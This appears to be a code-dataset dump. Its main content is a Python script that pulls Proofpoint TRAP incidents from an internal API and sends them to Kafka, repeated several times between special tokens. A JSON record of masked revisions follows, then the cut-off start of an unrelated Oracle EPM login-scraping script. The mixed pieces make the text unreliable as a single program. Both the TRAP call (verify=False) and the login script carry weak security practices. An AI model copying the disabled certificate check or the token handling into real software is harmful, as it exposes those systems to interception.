self.producer = KafkaProducer(bootstrap_servers=kafka_hosts, acks=1,
compression_type='snappy', retries=5, linger_ms=200, batch_size
=1000, request_timeout_ms=100000, sasl_plain_username=
kafka_uname, sasl_plain_password=kafka_pwd, security_protocol=
'SASL_SSL', sasl_mechanism='PLAIN', ssl_cafile=
ssl_truststore_file, api_version=(0, 10, 1))
def produce_message(self, message):
self.producer.send(self.topic_name, message)
def close(self):
self.producer.flush()
self.producer.close()
logger.info('closed')
def set_creds():
secrets = secret.get_secret('ngsiem-aca-kafka-config', ['username',
'password', 'kafka_hosts'])
os.environ['KAFKA_USERNAME'] = secrets['username']
os.environ['KAFKA_PASSWORD'] = secrets['password']
os.environ['KAFKA_HOSTS'] = secrets['kafka_hosts']
def run_kafka_producer_job(logs, topic_name):
set_creds()
producer = Producer(topic=topic_name)
logger.info('producer created')
try:
for l in logs:
to_send = json.dumps(l)
producer.produce_message(to_send.encode())
except Exception as e:
logger.info(f'Error gathering the file or producing to Kafka: {str(e)}'
)
raise e
finally:
producer.close()
def pull_pp_trap_logs(minutes_before):
logger.info('retrieving secrets for pp_trap')
current_time = datetime.datetime.utcnow()
if minutes_before > 0:
current_time = current_time - datetime.timedelta(minutes=minutes_before
)
fifteen_minutes_ago = (current_time - datetime.timedelta(minutes=15)
).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + 'Z'
twenty_minutes_ago = (current_time - datetime.timedelta(minutes=20)
).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + 'Z'
qs = {'created_after': twenty_minutes_ago, 'created_before':
fifteen_minutes_ago, 'expand_events': 'false'}
try:
r = requests.get('https://10.47.172.28/api/incidents', params=qs,
headers={'Authorization': prod.pp_trap_api_key}, verify=False)
print(r.status_code)
json_object = r.json()
print(json_object)
return json_object
except Exception as e:
sns.generate_sns('proofpoint_trap')
logger.error(f'Error for TRAP API call: {str(e)}')
if __name__ == '__main__':
minutes_before = 0 * 60
minutes_before_file = os.path.join(os.getcwd(), 'minutes_before')
if os.path.exists(minutes_before_file):
with open(minutes_before_file, 'r') as minutes_file:
line = minutes_file.readline()
line = line.strip()
minutes_before = int(line)
while True:
"""
Query TRAP API (JSON format) starting from minutes_before
send logs to kafka
reduce minutes_before in next iteration and repeat
when iteration reaches now -20 minutes
run the job once every 5 minutes
"""
logger.info(f'minutes before: {minutes_before}')
if minutes_before <= 0:
logger.info('waiting for 5 minutes')
time.sleep(300)
logger.info('TRAP query started')
logs = pull_pp_trap_logs(minutes_before)
logger.info('TRAP query finished')
minutes_before = minutes_before - 5
if logs:
logger.info('TRAP_produce started')
run_kafka_producer_job(logs,
'test_log_security_proofpoint.trap_weekly')
logger.info('TRAP_produce finished')
else:
logger.info('No logs for TRAP call.')
with open(minutes_before_file, 'w') as minutes_file:
minutes_before = 0 if minutes_before < 0 else minutes_before
minutes_file.write(str(minutes_before))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
logger = logging.getLogger()
logger.setLevel('INFO')
log_path = os.path.basename(__file__).split('.')[0] + '.log'
handler = RotatingFileHandler(log_path, maxBytes=1000000, backupCount=5)
formatter = logging.Formatter(
'[%(asctime)s] {%(pathname)s:%(lineno)d} %(levelname)s - %(message)s')
handler.setLevel(logging.DEBUG)
handler.setFormatter(formatter)
logger.addHandler(handler)
class Producer:
def __init__(self, topic):
kafka_uname = os.environ['KAFKA_USERNAME']
kafka_pwd = os.environ['KAFKA_PASSWORD']
kafka_hosts = os.environ['KAFKA_HOSTS']
ssl_truststore_file = '/opt/scripts/ca-cert.cer'
self.topic_name = topic
self.producer = KafkaProducer(bootstrap_servers=kafka_hosts, acks=1,
compression_type='snappy', retries=5, linger_ms=200, batch_size
=1000, request_timeout_ms=100000, sasl_plain_username=
kafka_uname, sasl_plain_password=kafka_pwd, security_protocol=
'SASL_SSL', sasl_mechanism='PLAIN', ssl_cafile=
ssl_truststore_file, api_version=(0, 10, 1))
def produce_message(self, message):
self.producer.send(self.topic_name, message)
def close(self):
self.producer.flush()
self.producer.close()
logger.info('closed')
def set_creds():
secrets = secret.get_secret('ngsiem-aca-kafka-config', ['username',
'password', 'kafka_hosts'])
os.environ['KAFKA_USERNAME'] = secrets['username']
os.environ['KAFKA_PASSWORD'] = secrets['password']
os.environ['KAFKA_HOSTS'] = secrets['kafka_hosts']
def run_kafka_producer_job(logs, topic_name):
set_creds()
producer = Producer(topic=topic_name)
logger.info('producer created')
try:
for l in logs:
to_send = json.dumps(l)
producer.produce_message(to_send.encode())
except Exception as e:
logger.info(f'Error gathering the file or producing to Kafka: {str(e)}'
)
raise e
finally:
producer.close()
def pull_pp_trap_logs(minutes_before):
logger.info('retrieving secrets for pp_trap')
current_time = datetime.datetime.utcnow()
if minutes_before > 0:
current_time = current_time - datetime.timedelta(minutes=minutes_before
)
fifteen_minutes_ago = (current_time - datetime.timedelta(minutes=15)
).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + 'Z'
twenty_minutes_ago = (current_time - datetime.timedelta(minutes=20)
).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + 'Z'
qs = {'created_after': twenty_minutes_ago, 'created_before':
fifteen_minutes_ago, 'expand_events': 'false'}
try:
r = requests.get('https://10.47.172.28/api/incidents', params=qs,
headers={'Authorization': prod.pp_trap_api_key}, verify=False)
print(r.status_code)
json_object = r.json()
print(json_object)
return json_object
except Exception as e:
sns.generate_sns('proofpoint_trap')
logger.error(f'Error for TRAP API call: {str(e)}')
if __name__ == '__main__':
minutes_before = 0 * 60
minutes_before_file = os.path.join(os.getcwd(), 'minutes_before')
if os.path.exists(minutes_before_file):
with open(minutes_before_file, 'r') as minutes_file:
line = minutes_file.readline()
line = line.strip()
minutes_before = int(line)
while True:
"""
Query TRAP API (JSON format) starting from minutes_before
send logs to kafka
reduce minutes_before in next iteration and repeat
when iteration reaches now -20 minutes
run the job once every 5 minutes
"""
logger.info(f'minutes before: {minutes_before}')
if minutes_before <= 0:
logger.info('waiting for 5 minutes')
time.sleep(300)
logger.info('TRAP query started')
logs = pull_pp_trap_logs(minutes_before)
logger.info('TRAP query finished')
minutes_before = minutes_before - 5
if logs:
logger.info('TRAP_produce started')
run_kafka_producer_job(logs,
'test_log_security_proofpoint.trap_weekly')
logger.info('TRAP_produce finished')
else:
logger.info('No logs for TRAP call.')
with open(minutes_before_file, 'w') as minutes_file:
minutes_before = 0 if minutes_before < 0 else minutes_before
minutes_file.write(str(minutes_before))
<|reserved_special_token_1|>
#!/usr/bin/env python3
import logging
import datetime
import os
import time
import json
import prod
import secret
from logging.handlers import RotatingFileHandler
import requests
import sns
from kafka import KafkaProducer
logger = logging.getLogger()
logger.setLevel('INFO')
log_path = os.path.basename(__file__).split('.')[0] + '.log'
handler = RotatingFileHandler(
log_path, maxBytes=1000000, backupCount=5)
formatter = logging.Formatter(
"[%(asctime)s] {%(pathname)s:%(lineno)d} %(levelname)s - %(message)s")
handler.setLevel(logging.DEBUG)
handler.setFormatter(formatter)
logger.addHandler(handler)
class Producer():
def __init__(self, topic):
kafka_uname = os.environ['KAFKA_USERNAME']
kafka_pwd = os.environ['KAFKA_PASSWORD']
kafka_hosts = os.environ['KAFKA_HOSTS']
ssl_truststore_file = '/opt/scripts/ca-cert.cer'
self.topic_name = topic
self.producer = KafkaProducer(
bootstrap_servers=kafka_hosts,
acks=1,
compression_type='snappy',
retries=5,
linger_ms=200,
batch_size=1000,
request_timeout_ms=100000,
sasl_plain_username=kafka_uname,
sasl_plain_password=kafka_pwd,
security_protocol="SASL_SSL",
sasl_mechanism="PLAIN",
# sasl_mechanism="SCRAM-SHA-512",
ssl_cafile=ssl_truststore_file,
api_version=(0, 10, 1)
)
def produce_message(self, message):
self.producer.send(self.topic_name, message)
def close(self):
self.producer.flush()
self.producer.close()
logger.info('closed')
def set_creds():
secrets = secret.get_secret(
'ngsiem-aca-kafka-config', ['username', 'password', 'kafka_hosts'])
os.environ['KAFKA_USERNAME'] = secrets['username']
os.environ['KAFKA_PASSWORD'] = secrets['password']
os.environ['KAFKA_HOSTS'] = secrets["kafka_hosts"]
def run_kafka_producer_job(logs, topic_name):
set_creds()
producer = Producer(topic=topic_name)
logger.info('producer created')
try:
for l in logs:
to_send = json.dumps(l)
producer.produce_message(to_send.encode())
except Exception as e:
logger.info(f'Error gathering the file or producing to Kafka: {str(e)}')
raise e
finally:
producer.close()
def pull_pp_trap_logs(minutes_before):
logger.info('retrieving secrets for pp_trap')
current_time = datetime.datetime.utcnow()
if minutes_before > 0:
current_time = current_time - \
datetime.timedelta(minutes=minutes_before)
fifteen_minutes_ago = (current_time - datetime.timedelta(minutes=15)).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + "Z"
twenty_minutes_ago = (current_time - datetime.timedelta(minutes=20)).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + "Z"
qs = {"created_after": twenty_minutes_ago, "created_before": fifteen_minutes_ago, "expand_events": "false"}
try:
r = requests.get('https://10.47.172.28/api/incidents', params=qs,
headers={'Authorization': prod.pp_trap_api_key}, verify=False)
print(r.status_code)
json_object = r.json()
print(json_object)
return json_object
except Exception as e:
sns.generate_sns("proofpoint_trap")
logger.error(f"Error for TRAP API call: {str(e)}")
if __name__ == "__main__":
minutes_before = 0 * 60
minutes_before_file = os.path.join(os.getcwd(), 'minutes_before')
if os.path.exists(minutes_before_file):
with open(minutes_before_file, 'r') as minutes_file:
line = minutes_file.readline()
line = line.strip()
minutes_before = int(line)
while True:
"""
Query TRAP API (JSON format) starting from minutes_before
send logs to kafka
reduce minutes_before in next iteration and repeat
when iteration reaches now -20 minutes
run the job once every 5 minutes
"""
logger.info(f'minutes before: {minutes_before}')
if minutes_before <= 0:
logger.info('waiting for 5 minutes')
time.sleep(300)
logger.info('TRAP query started')
logs = pull_pp_trap_logs(minutes_before)
logger.info('TRAP query finished')
minutes_before = minutes_before - 5
if logs:
logger.info('TRAP_produce started')
run_kafka_producer_job(logs, 'test_log_security_proofpoint.trap_weekly')
logger.info('TRAP_produce finished')
else:
logger.info("No logs for TRAP call.")
with open(minutes_before_file, 'w') as minutes_file:
minutes_before = 0 if minutes_before < 0 else minutes_before
minutes_file.write(str(minutes_before))
|
flexible
|
{
"blob_id": "283b93437072f0fd75d75dab733ecab05dc9e1f3",
"index": 3872,
"step-1": "<mask token>\n\n\nclass Producer:\n\n def __init__(self, topic):\n kafka_uname = os.environ['KAFKA_USERNAME']\n kafka_pwd = os.environ['KAFKA_PASSWORD']\n kafka_hosts = os.environ['KAFKA_HOSTS']\n ssl_truststore_file = '/opt/scripts/ca-cert.cer'\n self.topic_name = topic\n self.producer = KafkaProducer(bootstrap_servers=kafka_hosts, acks=1,\n compression_type='snappy', retries=5, linger_ms=200, batch_size\n =1000, request_timeout_ms=100000, sasl_plain_username=\n kafka_uname, sasl_plain_password=kafka_pwd, security_protocol=\n 'SASL_SSL', sasl_mechanism='PLAIN', ssl_cafile=\n ssl_truststore_file, api_version=(0, 10, 1))\n\n def produce_message(self, message):\n self.producer.send(self.topic_name, message)\n\n def close(self):\n self.producer.flush()\n self.producer.close()\n logger.info('closed')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Producer:\n\n def __init__(self, topic):\n kafka_uname = os.environ['KAFKA_USERNAME']\n kafka_pwd = os.environ['KAFKA_PASSWORD']\n kafka_hosts = os.environ['KAFKA_HOSTS']\n ssl_truststore_file = '/opt/scripts/ca-cert.cer'\n self.topic_name = topic\n self.producer = KafkaProducer(bootstrap_servers=kafka_hosts, acks=1,\n compression_type='snappy', retries=5, linger_ms=200, batch_size\n =1000, request_timeout_ms=100000, sasl_plain_username=\n kafka_uname, sasl_plain_password=kafka_pwd, security_protocol=\n 'SASL_SSL', sasl_mechanism='PLAIN', ssl_cafile=\n ssl_truststore_file, api_version=(0, 10, 1))\n\n def produce_message(self, message):\n self.producer.send(self.topic_name, message)\n\n def close(self):\n self.producer.flush()\n self.producer.close()\n logger.info('closed')\n\n\ndef set_creds():\n secrets = secret.get_secret('ngsiem-aca-kafka-config', ['username',\n 'password', 'kafka_hosts'])\n os.environ['KAFKA_USERNAME'] = secrets['username']\n os.environ['KAFKA_PASSWORD'] = secrets['password']\n os.environ['KAFKA_HOSTS'] = secrets['kafka_hosts']\n\n\ndef run_kafka_producer_job(logs, topic_name):\n set_creds()\n producer = Producer(topic=topic_name)\n logger.info('producer created')\n try:\n for l in logs:\n to_send = json.dumps(l)\n producer.produce_message(to_send.encode())\n except Exception as e:\n logger.info(f'Error gathering the file or producing to Kafka: {str(e)}'\n )\n raise e\n finally:\n producer.close()\n\n\ndef pull_pp_trap_logs(minutes_before):\n logger.info('retrieving secrets for pp_trap')\n current_time = datetime.datetime.utcnow()\n if minutes_before > 0:\n current_time = current_time - datetime.timedelta(minutes=minutes_before\n )\n fifteen_minutes_ago = (current_time - datetime.timedelta(minutes=15)\n ).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + 'Z'\n twenty_minutes_ago = (current_time - datetime.timedelta(minutes=20)\n ).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + 'Z'\n qs = {'created_after': twenty_minutes_ago, 'created_before':\n fifteen_minutes_ago, 'expand_events': 'false'}\n try:\n r = requests.get('https://10.47.172.28/api/incidents', params=qs,\n headers={'Authorization': prod.pp_trap_api_key}, verify=False)\n print(r.status_code)\n json_object = r.json()\n print(json_object)\n return json_object\n except Exception as e:\n sns.generate_sns('proofpoint_trap')\n logger.error(f'Error for TRAP API call: {str(e)}')\n\n\n<mask token>\n",
"step-3": "<mask token>\nlogger.setLevel('INFO')\n<mask token>\nhandler.setLevel(logging.DEBUG)\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\n\nclass Producer:\n\n def __init__(self, topic):\n kafka_uname = os.environ['KAFKA_USERNAME']\n kafka_pwd = os.environ['KAFKA_PASSWORD']\n kafka_hosts = os.environ['KAFKA_HOSTS']\n ssl_truststore_file = '/opt/scripts/ca-cert.cer'\n self.topic_name = topic\n self.producer = KafkaProducer(bootstrap_servers=kafka_hosts, acks=1,\n compression_type='snappy', retries=5, linger_ms=200, batch_size\n =1000, request_timeout_ms=100000, sasl_plain_username=\n kafka_uname, sasl_plain_password=kafka_pwd, security_protocol=\n 'SASL_SSL', sasl_mechanism='PLAIN', ssl_cafile=\n ssl_truststore_file, api_version=(0, 10, 1))\n\n def produce_message(self, message):\n self.producer.send(self.topic_name, message)\n\n def close(self):\n self.producer.flush()\n self.producer.close()\n logger.info('closed')\n\n\ndef set_creds():\n secrets = secret.get_secret('ngsiem-aca-kafka-config', ['username',\n 'password', 'kafka_hosts'])\n os.environ['KAFKA_USERNAME'] = secrets['username']\n os.environ['KAFKA_PASSWORD'] = secrets['password']\n os.environ['KAFKA_HOSTS'] = secrets['kafka_hosts']\n\n\ndef run_kafka_producer_job(logs, topic_name):\n set_creds()\n producer = Producer(topic=topic_name)\n logger.info('producer created')\n try:\n for l in logs:\n to_send = json.dumps(l)\n producer.produce_message(to_send.encode())\n except Exception as e:\n logger.info(f'Error gathering the file or producing to Kafka: {str(e)}'\n )\n raise e\n finally:\n producer.close()\n\n\ndef pull_pp_trap_logs(minutes_before):\n logger.info('retrieving secrets for pp_trap')\n current_time = datetime.datetime.utcnow()\n if minutes_before > 0:\n current_time = current_time - datetime.timedelta(minutes=minutes_before\n )\n fifteen_minutes_ago = (current_time - datetime.timedelta(minutes=15)\n ).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + 'Z'\n twenty_minutes_ago = (current_time - datetime.timedelta(minutes=20)\n ).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + 'Z'\n qs = {'created_after': twenty_minutes_ago, 'created_before':\n fifteen_minutes_ago, 'expand_events': 'false'}\n try:\n r = requests.get('https://10.47.172.28/api/incidents', params=qs,\n headers={'Authorization': prod.pp_trap_api_key}, verify=False)\n print(r.status_code)\n json_object = r.json()\n print(json_object)\n return json_object\n except Exception as e:\n sns.generate_sns('proofpoint_trap')\n logger.error(f'Error for TRAP API call: {str(e)}')\n\n\nif __name__ == '__main__':\n minutes_before = 0 * 60\n minutes_before_file = os.path.join(os.getcwd(), 'minutes_before')\n if os.path.exists(minutes_before_file):\n with open(minutes_before_file, 'r') as minutes_file:\n line = minutes_file.readline()\n line = line.strip()\n minutes_before = int(line)\n while True:\n \"\"\"\n Query TRAP API (JSON format) starting from minutes_before\n send logs to kafka\n reduce minutes_before in next iteration and repeat\n when iteration reaches now -20 minutes\n run the job once every 5 minutes\n \"\"\"\n logger.info(f'minutes before: {minutes_before}')\n if minutes_before <= 0:\n logger.info('waiting for 5 minutes')\n time.sleep(300)\n logger.info('TRAP query started')\n logs = pull_pp_trap_logs(minutes_before)\n logger.info('TRAP query finished')\n minutes_before = minutes_before - 5\n if logs:\n logger.info('TRAP_produce started')\n run_kafka_producer_job(logs,\n 'test_log_security_proofpoint.trap_weekly')\n logger.info('TRAP_produce finished')\n else:\n logger.info('No logs for TRAP call.')\n with open(minutes_before_file, 'w') as minutes_file:\n minutes_before = 0 if minutes_before < 0 else minutes_before\n minutes_file.write(str(minutes_before))\n",
"step-4": "<mask token>\nlogger = logging.getLogger()\nlogger.setLevel('INFO')\nlog_path = os.path.basename(__file__).split('.')[0] + '.log'\nhandler = RotatingFileHandler(log_path, maxBytes=1000000, backupCount=5)\nformatter = logging.Formatter(\n '[%(asctime)s] {%(pathname)s:%(lineno)d} %(levelname)s - %(message)s')\nhandler.setLevel(logging.DEBUG)\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\n\nclass Producer:\n\n def __init__(self, topic):\n kafka_uname = os.environ['KAFKA_USERNAME']\n kafka_pwd = os.environ['KAFKA_PASSWORD']\n kafka_hosts = os.environ['KAFKA_HOSTS']\n ssl_truststore_file = '/opt/scripts/ca-cert.cer'\n self.topic_name = topic\n self.producer = KafkaProducer(bootstrap_servers=kafka_hosts, acks=1,\n compression_type='snappy', retries=5, linger_ms=200, batch_size\n =1000, request_timeout_ms=100000, sasl_plain_username=\n kafka_uname, sasl_plain_password=kafka_pwd, security_protocol=\n 'SASL_SSL', sasl_mechanism='PLAIN', ssl_cafile=\n ssl_truststore_file, api_version=(0, 10, 1))\n\n def produce_message(self, message):\n self.producer.send(self.topic_name, message)\n\n def close(self):\n self.producer.flush()\n self.producer.close()\n logger.info('closed')\n\n\ndef set_creds():\n secrets = secret.get_secret('ngsiem-aca-kafka-config', ['username',\n 'password', 'kafka_hosts'])\n os.environ['KAFKA_USERNAME'] = secrets['username']\n os.environ['KAFKA_PASSWORD'] = secrets['password']\n os.environ['KAFKA_HOSTS'] = secrets['kafka_hosts']\n\n\ndef run_kafka_producer_job(logs, topic_name):\n set_creds()\n producer = Producer(topic=topic_name)\n logger.info('producer created')\n try:\n for l in logs:\n to_send = json.dumps(l)\n producer.produce_message(to_send.encode())\n except Exception as e:\n logger.info(f'Error gathering the file or producing to Kafka: {str(e)}'\n )\n raise e\n finally:\n producer.close()\n\n\ndef pull_pp_trap_logs(minutes_before):\n logger.info('retrieving secrets for pp_trap')\n current_time = datetime.datetime.utcnow()\n if minutes_before > 0:\n current_time = current_time - datetime.timedelta(minutes=minutes_before\n )\n fifteen_minutes_ago = (current_time - datetime.timedelta(minutes=15)\n ).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + 'Z'\n twenty_minutes_ago = (current_time - datetime.timedelta(minutes=20)\n ).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + 'Z'\n qs = {'created_after': twenty_minutes_ago, 'created_before':\n fifteen_minutes_ago, 'expand_events': 'false'}\n try:\n r = requests.get('https://10.47.172.28/api/incidents', params=qs,\n headers={'Authorization': prod.pp_trap_api_key}, verify=False)\n print(r.status_code)\n json_object = r.json()\n print(json_object)\n return json_object\n except Exception as e:\n sns.generate_sns('proofpoint_trap')\n logger.error(f'Error for TRAP API call: {str(e)}')\n\n\nif __name__ == '__main__':\n minutes_before = 0 * 60\n minutes_before_file = os.path.join(os.getcwd(), 'minutes_before')\n if os.path.exists(minutes_before_file):\n with open(minutes_before_file, 'r') as minutes_file:\n line = minutes_file.readline()\n line = line.strip()\n minutes_before = int(line)\n while True:\n \"\"\"\n Query TRAP API (JSON format) starting from minutes_before\n send logs to kafka\n reduce minutes_before in next iteration and repeat\n when iteration reaches now -20 minutes\n run the job once every 5 minutes\n \"\"\"\n logger.info(f'minutes before: {minutes_before}')\n if minutes_before <= 0:\n logger.info('waiting for 5 minutes')\n time.sleep(300)\n logger.info('TRAP query started')\n logs = pull_pp_trap_logs(minutes_before)\n logger.info('TRAP query finished')\n minutes_before = minutes_before - 5\n if logs:\n logger.info('TRAP_produce started')\n run_kafka_producer_job(logs,\n 'test_log_security_proofpoint.trap_weekly')\n logger.info('TRAP_produce finished')\n else:\n logger.info('No logs for TRAP call.')\n with open(minutes_before_file, 'w') as minutes_file:\n minutes_before = 0 if minutes_before < 0 else minutes_before\n minutes_file.write(str(minutes_before))\n",
"step-5": "#!/usr/bin/env python3\nimport logging\nimport datetime\nimport os\nimport time\nimport json\n\nimport prod\nimport secret\nfrom logging.handlers import RotatingFileHandler\nimport requests\nimport sns\nfrom kafka import KafkaProducer\n\nlogger = logging.getLogger()\nlogger.setLevel('INFO')\nlog_path = os.path.basename(__file__).split('.')[0] + '.log'\n\nhandler = RotatingFileHandler(\n log_path, maxBytes=1000000, backupCount=5)\nformatter = logging.Formatter(\n \"[%(asctime)s] {%(pathname)s:%(lineno)d} %(levelname)s - %(message)s\")\nhandler.setLevel(logging.DEBUG)\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\n\nclass Producer():\n def __init__(self, topic):\n kafka_uname = os.environ['KAFKA_USERNAME']\n kafka_pwd = os.environ['KAFKA_PASSWORD']\n kafka_hosts = os.environ['KAFKA_HOSTS']\n ssl_truststore_file = '/opt/scripts/ca-cert.cer'\n\n self.topic_name = topic\n\n self.producer = KafkaProducer(\n bootstrap_servers=kafka_hosts,\n acks=1,\n compression_type='snappy',\n retries=5,\n linger_ms=200,\n batch_size=1000,\n request_timeout_ms=100000,\n sasl_plain_username=kafka_uname,\n sasl_plain_password=kafka_pwd,\n security_protocol=\"SASL_SSL\",\n sasl_mechanism=\"PLAIN\",\n # sasl_mechanism=\"SCRAM-SHA-512\",\n ssl_cafile=ssl_truststore_file,\n api_version=(0, 10, 1)\n )\n\n def produce_message(self, message):\n self.producer.send(self.topic_name, message)\n\n def close(self):\n self.producer.flush()\n self.producer.close()\n logger.info('closed')\n\n\ndef set_creds():\n secrets = secret.get_secret(\n 'ngsiem-aca-kafka-config', ['username', 'password', 'kafka_hosts'])\n os.environ['KAFKA_USERNAME'] = secrets['username']\n os.environ['KAFKA_PASSWORD'] = secrets['password']\n os.environ['KAFKA_HOSTS'] = secrets[\"kafka_hosts\"]\n\n\ndef run_kafka_producer_job(logs, topic_name):\n set_creds()\n producer = Producer(topic=topic_name)\n logger.info('producer created')\n try:\n for l in logs:\n to_send = json.dumps(l)\n producer.produce_message(to_send.encode())\n except Exception as e:\n logger.info(f'Error gathering the file or producing to Kafka: {str(e)}')\n raise e\n\n finally:\n producer.close()\n\n\ndef pull_pp_trap_logs(minutes_before):\n logger.info('retrieving secrets for pp_trap')\n current_time = datetime.datetime.utcnow()\n if minutes_before > 0:\n current_time = current_time - \\\n datetime.timedelta(minutes=minutes_before)\n\n fifteen_minutes_ago = (current_time - datetime.timedelta(minutes=15)).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + \"Z\"\n twenty_minutes_ago = (current_time - datetime.timedelta(minutes=20)).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-4] + \"Z\"\n\n qs = {\"created_after\": twenty_minutes_ago, \"created_before\": fifteen_minutes_ago, \"expand_events\": \"false\"}\n try:\n r = requests.get('https://10.47.172.28/api/incidents', params=qs,\n headers={'Authorization': prod.pp_trap_api_key}, verify=False)\n print(r.status_code)\n\n json_object = r.json()\n print(json_object)\n return json_object\n\n except Exception as e:\n sns.generate_sns(\"proofpoint_trap\")\n logger.error(f\"Error for TRAP API call: {str(e)}\")\n\n\nif __name__ == \"__main__\":\n minutes_before = 0 * 60\n minutes_before_file = os.path.join(os.getcwd(), 'minutes_before')\n if os.path.exists(minutes_before_file):\n with open(minutes_before_file, 'r') as minutes_file:\n line = minutes_file.readline()\n line = line.strip()\n minutes_before = int(line)\n\n while True:\n \"\"\"\n Query TRAP API (JSON format) starting from minutes_before\n send logs to kafka\n reduce minutes_before in next iteration and repeat\n when iteration reaches now -20 minutes\n run the job once every 5 minutes\n \"\"\"\n logger.info(f'minutes before: {minutes_before}')\n if minutes_before <= 0:\n logger.info('waiting for 5 minutes')\n time.sleep(300)\n\n logger.info('TRAP query started')\n logs = pull_pp_trap_logs(minutes_before)\n logger.info('TRAP query finished')\n minutes_before = minutes_before - 5\n\n if logs:\n logger.info('TRAP_produce started')\n run_kafka_producer_job(logs, 'test_log_security_proofpoint.trap_weekly')\n logger.info('TRAP_produce finished')\n else:\n logger.info(\"No logs for TRAP call.\")\n with open(minutes_before_file, 'w') as minutes_file:\n minutes_before = 0 if minutes_before < 0 else minutes_before\n minutes_file.write(str(minutes_before))",
"step-ids": [
4,
7,
8,
9,
11
]
}
|
[
4,
7,
8,
9,
11
] |
#! py -3
# -*- coding: utf-8 -*-
import requests
from urllib.parse import quote
import logging
from urllib.parse import urlparse
logger = logging.getLogger(__name__)
logger = logging.getLogger()
# 配置日志级别,如果不显示配置,默认为Warning,表示所有warning级别已下的其他level直接被省略,
# 内部绑定的handler对象也只能接收到warning级别以上的level,你可以理解为总开关
logger.setLevel(logging.INFO)
formatter = logging.Formatter(fmt="%(asctime)s %(filename)s[line:%(lineno)d]%(levelname)s - %(message)s",
datefmt="%m/%d/%Y %I:%M:%S %p") # 创建一个格式化对象
console = logging.StreamHandler() # 配置日志输出到控制台
console.setLevel(logging.INFO) # 设置输出到控制台的最低日志级别
console.setFormatter(formatter) # 设置格式
logger.addHandler(console)
# 后续这些配置项都会移动到一个单独的配置文件
userAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
# serverUrl = "http://192.168.60.125:19000/"
serverUrl = "http://epm.huaxinglu72hao.com/"
host = "epm.huaxinglu72hao.com"
# 定义当前会话
# 会话使用统一的header 和 cookie
# 下面代码更新header 和 cookie 的使用后续的所有请求都会使用更新后的header 和 cookie
# 所以下面的函数没有返回值
s = requests.Session()
s.headers.update({"User-Agent": userAgent})
s.headers.update({"Referer": serverUrl})
s.headers.update({"Host": host})
def workspaceLogon(account, password):
# 登录
logger.info("logon: 开始模拟登录workspace")
postUrl = "%sworkspace/logon" % serverUrl
postData = {
"sso_username": account,
"sso_password": password,
}
try:
responseRes = s.post(postUrl, data = postData)
except Exception as e:
logger.error(e)
raise RuntimeError("登录失败: 网络异常, 请检查服务器地址配置")
logger.info("登录返回: " + responseRes.text)
# 无论是否登录成功,状态码一般都是 statusCode = 200
sso_token = responseRes.text.split('[')[2].split(']')[0]
assertertoken = responseRes.text.split('[')[6].split(']')[0]
assertertoken_ = {"ora_epm_ctg": assertertoken}
updateHeaders(assertertoken_)
token = {"_sso_token": sso_token}
updateHeaders(token)
CSRF = responseRes.headers.get("X-ORACLE-BPMUI-CSRF")
csrf_ = {"X-ORACLE-BPMUI-CSRF": CSRF}
updateHeaders(csrf_)
ECID = responseRes.headers.get("X-ORACLE-DMS-ECID")
h = {"X-ORACLE-DMS-ECID": ECID}
updateHeaders(h)
def updateHeaders(h):
logger.info(f"更新请求头: {h}")
s.headers.update(h)
def request_dyn():
logger.info ("dyn: 开始测试请求")
postUrl = "%s/raframework/browse/dyn" % serverUrl
postData={
"page": "/conf/CDSConfig.jsp",
"amp":"",
"action": "returnXML",
"LOCALE_LANGUAGE": "en_US",
"rightToLeft": "false",
"accessibilityMode": "false",
"themeSelection": "Skyros",
"sso_token": s.headers.get("_sso_token")
}
responseRes = s.post(postUrl, data=postData)
# logger.info(f"dyn: 响应text:{responseRes.text}")
logger.info(f"dyn: 响应header:{responseRes.headers}")
def request_planning_session(plan_name):
"""
"accessibilityMode": "false",
"bpm.contentheight": "621",
"bpm.contentwidth": "1314",
"bpm.objectpaletteheight": "648",
"bpm.objectpalettewidth": "207",
"cluster": "PLANNING_LWA",
"instance": "7",
"LOCALE_LANGUAGE": "zh_CN",
"mru_id": "PLANNING_LWA_JSTI1:application",
"repository_token": "59d9b714b22a35fb616dd3c05c5850d56b12522a9561499e9ea22afd918b6d36ea703f19668538504f86305c84f95441a1daf4cac09725703738d5073524871af0489411df16d2bb8f5d4726acdcc389b45e9e6ff00482249c53c1886ca68bfc090fcfbd365243996436f5bbe3affd9c87f6d5e8b7626e59adaeebcc4a89a66ef9725d8d4218c8b0c15912455a2690fcd2391a71806767f05fe66b395dda3e74b75ffa16e80c7814c47657dbc5d652da1044edc74ff20d6e604bdd733542457c3befca52c0700d758445b00ad519d0e8dee43e40cb78e070caca6b7c7a56008b2cbad75e83c7c8454f93177992f9166721331db1e11e48a113a51b3ebc2a79f1d74199127183d7708c47a3ff71663d9d",
"rightToLeft": "false",
"sourceApp": "JSTI1",
